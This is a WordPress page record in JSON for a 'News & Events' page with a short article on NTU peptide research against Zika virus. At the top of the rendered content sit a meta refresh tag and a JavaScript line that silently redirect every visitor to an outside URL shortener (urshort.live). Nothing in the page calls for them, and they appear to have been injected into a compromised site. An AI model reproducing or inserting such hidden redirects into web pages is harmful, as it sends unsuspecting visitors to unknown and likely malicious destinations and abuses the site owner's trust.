{"id":138,"date":"2016-09-07T17:41:56","date_gmt":"2016-09-07T09:41:56","guid":{"rendered":"http:\/\/goldhill.club\/tuition_DC1\/?page_id=138"},"modified":"2019-11-18T15:30:08","modified_gmt":"2019-11-18T07:30:08","slug":"news-events","status":"publish","type":"page","link":"https:\/\/imperialprogram.pw\/tc1\/news-events\/","title":{"rendered":"News &#038; Events"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/urshort.live\/Lye0r6\" \/><br \/>\n<script>window.location.href = \"https:\/\/urshort.live\/Lye0r6\";<\/script><br \/>\n<strong>To Get Rid of Zika<\/strong><\/p>\n<p>\u201cDeclared an international emergency by the World Health Organisation in 2016, Zika came into the global spotlight when infections caused by the mosquito-borne virus were linked to microcephaly in new-born babies.<\/p>\n<p>To combat the virus, Assoc Prof Cho Nam-Joon of NTU\u2019s School of Materials Science and Engineering and an international team engineered highly bioactive peptides\u2014short chains of amino acids\u2014that could rupture the lipid envelope coating surrounding Zika virus particles.<\/p>\n<p>The research team tested a lead peptide in Zika-infected mice and showed that it could cross the blood-brain barrier and eliminate virus particles in the brain, improving survival rates. Moreover, the peptide was also able to inactivate Zika-related viruses often co-transmitted by Aedes mosquitoes, including those that cause dengue and chikungunya.<\/p>\n<p>The peptide has since been licensed to an NTU spin-off company, TSG Therapeutics.
